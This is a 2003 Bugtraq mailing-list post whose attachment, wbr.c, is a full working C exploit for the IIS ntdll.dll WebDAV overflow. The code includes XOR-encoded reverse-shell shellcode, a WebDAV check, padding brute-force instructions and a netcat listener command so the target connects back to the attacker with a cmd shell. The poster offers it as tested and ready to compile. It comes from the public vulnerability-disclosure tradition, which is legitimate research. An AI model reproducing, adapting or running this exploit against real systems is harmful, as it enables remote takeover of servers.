[29448] in bugtraq
WebDav Exploit ffs
daemon@ATHENA.MIT.EDU (=?iso-8859-1?Q?Rafael_Nu=F1ez?=)
Mon Mar 24 14:16:16 2003
Message-ID: <021601c2f237$2f3a05d0$1500000a@scientech.com.ve>
From: =?iso-8859-1?Q?Rafael_Nu=F1ez?= <rnunez@scientech.com.ve>
To: <bugtraq@securityfocus.com>, <vulnwatch@vulnwatch.org>
Date: Mon, 24 Mar 2003 14:57:13 -0400
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_0213_01C2F215.A761E180"
------=_NextPart_000_0213_01C2F215.A761E180
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
I've been receiving a bunch of emails concerning if the exploit that I sent
to the list (iis_txt.c ) was focus on WebDav Vuln.. Of course Not (was a
totally different one, based on the old *.asp like iistart.asp). If David
Litchfield read the 1st one he prolly cried.
Regarding this I'm sending the WebDav exploit tested 100% by me
Best Regards
Note: don't ask for the binary one.. Please compile yourself.
-----------------------------------------------------
Rafael Núñez
Senior Research Scientist
Latin American Security & Intelligence Operations
Scientech de Venezuela
-----------------------------------------------------
[w] http://www.scientech.com.ve
[e] rnunez@scientech.com.ve
----------------------------------------------------
Tlf.:(58-212) 952.42.66
Fax:(58-212) 951.36.35
----------------------------------------------------
------=_NextPart_000_0213_01C2F215.A761E180
Content-Type: application/octet-stream;
name="wbr.c"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
filename="wbr.c"
/*******************************************************************/
/* [Crpt] ntdll.dll exploit trough WebDAV by kralor [Crpt] */
/* --------------------------------------------------------------- */
/* this is the exploit for ntdll.dll through WebDAV. */
/* run a netcat ex: nc -L -vv -p 666 */
/* wb server.com your_ip 666 0 */
/* the shellcode is a reverse remote shell */
/* you need to pad a bit.. the best way I think is launching */
/* the exploit with pad =3D 0 and after that, the server will be */
/* down for a couple of seconds, now retry with pad at 1 */
/* and so on..pad 2.. pad 3.. if you haven't the shell after */
/* something like pad at 10 I think you better to restart from */
/* pad at 0. On my local IIS the pad was at 1 (0x00110011) but */
/* on all the others servers it was at 2,3,4, etc..sometimes */
/* you can have the force with you, and get the shell in 1 try */
/* sometimes you need to pad more than 10 times ;) */
/* the shellcode was coded by myself, it is SEH + ScanMem to */
/* find the famous offsets (GetProcAddress).. */
/* I know I code like a pig, my english sucks, and my tech too */
/* it is my first exploit..and my first shellcode..sorry :P */
/* if you have comments feel free to mail me at: */
/* mailto: kralor@coromputer.net */
/* or visit us at www.coromputer.net . You can speak with us */
/* at IRC undernet channel #coromputer */
/* ok now the greetz: */
/* [El0d1e] to help me find some information about the bug :) */
/* tuck_ to support me ;) */
/* and all my friends in coromputer crew! hein les poulets! =3D) */
/* */
/* Tested by Rafael [RaFa] Nunez rnunez@scientech.com.ve */
/* */
/* (take off the WSAStartup, change the closesocket, change */
/* headers and it will run on linux boxes ;pPpPpP ). */
/* */
/*******************************************************************/
#include <winsock.h>
#include <windows.h>
#include <stdio.h>
#pragma comment (lib,"ws2_32")
char shellc0de[] =3D
=
"\x55\x8b\xec\x33\xc9\x53\x56\x57\x8d\x7d\xa2\xb1\x25\xb8\xcc\xcc"
=
"\xcc\xcc\xf3\xab\xeb\x09\xeb\x0c\x58\x5b\x59\x5a\x5c\x5d\xc3\xe8"
=
"\xf2\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66\xb9\xb5\x01\x80\x33"
=
"\x95\x43\xe2\xfa\x66\x83\xeb\x67\xfc\x8b\xcb\x8b\xf3\x66\x83\xc6"
=
"\x46\xad\x56\x40\x74\x16\x55\xe8\x13\x00\x00\x00\x8b\x64\x24\x08"
=
"\x64\x8f\x05\x00\x00\x00\x00\x58\x5d\x5e\xeb\xe5\x58\xeb\xb9\x64"
=
"\xff\x35\x00\x00\x00\x00\x64\x89\x25\x00\x00\x00\x00\x48\x66\x81"
=
"\x38\x4d\x5a\x75\xdb\x64\x8f\x05\x00\x00\x00\x00\x5d\x5e\x8b\xe8"
=
"\x03\x40\x3c\x8b\x78\x78\x03\xfd\x8b\x77\x20\x03\xf5\x33\xd2\x8b"
=
"\x06\x03\xc5\x81\x38\x47\x65\x74\x50\x75\x25\x81\x78\x04\x72\x6f"
=
"\x63\x41\x75\x1c\x81\x78\x08\x64\x64\x72\x65\x75\x13\x8b\x47\x24"
=
"\x03\xc5\x0f\xb7\x1c\x50\x8b\x47\x1c\x03\xc5\x8b\x1c\x98\x03\xdd"
=
"\x83\xc6\x04\x42\x3b\x57\x18\x75\xc6\x8b\xf1\x56\x55\xff\xd3\x83"
=
"\xc6\x0f\x89\x44\x24\x20\x56\x55\xff\xd3\x8b\xec\x81\xec\x94\x00"
=
"\x00\x00\x83\xc6\x0d\x56\xff\xd0\x89\x85\x7c\xff\xff\xff\x89\x9d"
=
"\x78\xff\xff\xff\x83\xc6\x0b\x56\x50\xff\xd3\x33\xc9\x51\x51\x51"
=
"\x51\x41\x51\x41\x51\xff\xd0\x89\x85\x94\x00\x00\x00\x8b\x85\x7c"
=
"\xff\xff\xff\x83\xc6\x0b\x56\x50\xff\xd3\x83\xc6\x08\x6a\x10\x56"
=
"\x8b\x8d\x94\x00\x00\x00\x51\xff\xd0\x33\xdb\xc7\x45\x8c\x44\x00"
=
"\x00\x00\x89\x5d\x90\x89\x5d\x94\x89\x5d\x98\x89\x5d\x9c\x89\x5d"
=
"\xa0\x89\x5d\xa4\x89\x5d\xa8\xc7\x45\xb8\x01\x01\x00\x00\x89\x5d"
=
"\xbc\x89\x5d\xc0\x8b\x9d\x94\x00\x00\x00\x89\x5d\xc4\x89\x5d\xc8"
=
"\x89\x5d\xcc\x8d\x45\xd0\x50\x8d\x4d\x8c\x51\x6a\x00\x6a\x00\x6a"
=
"\x00\x6a\x01\x6a\x00\x6a\x00\x83\xc6\x09\x56\x6a\x00\x8b\x45\x20"
"\xff\xd0"
"CreateProcessA\x00LoadLibraryA\x00ws2_32.dll\x00WSASocketA\x00"
"connect\x00\x02\x00\x02\x9A\xC0\xA8\x01\x01\x00"
"cmd" // don't change anything..
"\x00\x00\xe7\x77" // offsets of kernel32.dll for some win ver..
"\x00\x00\xe8\x77"
"\x00\x00\xf0\x77"
"\x00\x00\xe4\x77"
"\x00\x88\x3e\x04" // win2k3
"\x00\x00\xf7\xbf" // win9x =3DP
"\xff\xff\xff\xff";
int test_host(char *host)
{
char search[100]=3D"";
int sock;
struct hostent *heh;
struct sockaddr_in hmm;
char buf[100] =3D"";
if(strlen(host)>60) {
printf("error: victim host too long.\r\n");
return 1;
}
if ((heh =3D gethostbyname(host))=3D=3D0){
printf("error: can't resolve '%s'",host);
return 1;
}
sprintf(search,"SEARCH / HTTP/1.1\r\nHost: %s\r\n\r\n",host);
hmm.sin_port =3D htons(80);
hmm.sin_family =3D AF_INET;
hmm.sin_addr =3D *((struct in_addr *)heh->h_addr);
if ((sock =3D socket(AF_INET, SOCK_STREAM, 0)) =3D=3D -1){
printf("error: can't create socket");
return 1;
}
printf("Checking WebDav on '%s' ... ",host);
if ((connect(sock, (struct sockaddr *) &hmm, sizeof(hmm))) =3D=3D =
-1){
printf("CONNECTING_ERROR\r\n");
return 1;
}
send(sock,search,strlen(search),0);
recv(sock,buf,sizeof(buf),0);
if(buf[9]=3D=3D'4'&&buf[10]=3D=3D'1'&&buf[11]=3D=3D'1')
return 0;
printf("NOT FOUND\r\n");
return 1;
}
void help(char *program)
{
printf("syntax: %s <victim_host> <your_host> =
<your_port> [padding]\r\n",program);
return;
}
void banner(void)
{
printf("\r\n\t [Crpt] ntdll.dll exploit trough WebDAV by kralor
[Crpt]\r\n");
printf("\t\twww.coromputer.net && undernet =
#coromputer\r\n\r\n");
return;
}
void main(int argc, char *argv[])
{
WSADATA wsaData;
unsigned short port=3D0;
char *port_to_shell=3D"", *ip1=3D"", data[50]=3D"";
unsigned int i,j;
unsigned int ip =3D 0 ;
int s, PAD=3D0x10;
struct hostent *he;
struct sockaddr_in crpt;
char buffer[65536] =3D"";
char request[80000]; // huuuh, what a mess! :)
char content[] =3D
"<?xml version=3D\"1.0\"?>\r\n"
"<g:searchrequest xmlns:g=3D\"DAV:\">\r\n"
"<g:sql>\r\n"
"Select \"DAV:displayname\" from scope()\r\n"
"</g:sql>\r\n"
"</g:searchrequest>\r\n";
banner();
if((argc<4)||(argc>5)) {
help(argv[0]);
return;
}
if(WSAStartup(0x0101,&wsaData)!=3D0) {
printf("error starting winsock..");
return;
}
if(test_host(argv[1]))
return;
if(argc=3D=3D5)
PAD+=3Datoi(argv[4]);
printf("FOUND\r\nexploiting ntdll.dll through WebDav [ret: =
0x00%02x00%02x]\r\n",PAD,PAD);
ip =3D inet_addr(argv[2]); ip1 =3D (char*)&ip;
shellc0de[448]=3Dip1[0]; shellc0de[449]=3Dip1[1]; =
shellc0de[450]=3Dip1[2];
shellc0de[451]=3Dip1[3];
port =3D htons(atoi(argv[3]));
port_to_shell =3D (char *) &port;
shellc0de[446]=3Dport_to_shell[0];
shellc0de[447]=3Dport_to_shell[1];
// we xor the shellcode [xored by 0x95 to avoid bad chars]
__asm {
lea eax, shellc0de
add eax, 0x34
xor ecx, ecx
mov cx, 0x1b0
wah:
xor byte ptr[eax], 0x95
inc eax
loop wah
}
if ((he =3D gethostbyname(argv[1]))=3D=3D0){
printf("error: can't resolve '%s'",argv[1]);
return;
}
crpt.sin_port =3D htons(80);
crpt.sin_family =3D AF_INET;
crpt.sin_addr =3D *((struct in_addr *)he->h_addr);
if ((s =3D socket(AF_INET, SOCK_STREAM, 0)) =3D=3D -1){
printf("error: can't create socket");
return;
}
printf("Connecting... ");
if ((connect(s, (struct sockaddr *) &crpt, sizeof(crpt))) =3D=3D =
-1){
printf("ERROR\r\n");
return;
}
// No Operation.
for(i=3D0;i<sizeof(buffer);buffer[i]=3D(char)0x90,i++);
// fill the buffer with the shellcode
for(i=3D64000,j=3D0;i<sizeof(buffer)&&j<sizeof(shellc0de)-1=
;buffer[i]=3Dshellc0de[j],i++,j++);
// well..it is not necessary..
for(i=3D0;i<2500;buffer[i]=3DPAD,i++);
/* we can simply put our ret in this 2 offsets.. */
//buffer[2086]=3DPAD;
//buffer[2085]=3DPAD;
buffer[sizeof(buffer)]=3D0x00;
memset(request,0,sizeof(request));
memset(data,0,sizeof(data));
sprintf(request,"SEARCH /%s HTTP/1.1\r\nHost: %s\r\nContent-type: =
text/xml\r\nContent-Length: ",buffer,argv[1]);
sprintf(request,"%s%d\r\n\r\n",request,strlen(content));
printf("CONNECTED\r\nSending evil request... ");
send(s,request,strlen(request),0);
send(s,content,strlen(content),0);
printf("SENT\r\n");
recv(s,data,sizeof(data),0);
if(data[0]!=3D0x00) {
printf("Server seems to be patched.\r\n");
printf("data: %s\r\n",data);
} else
printf("Now if you are lucky you will get a shell.\r\n");
closesocket(s);
return;
}
------=_NextPart_000_0213_01C2F215.A761E180--
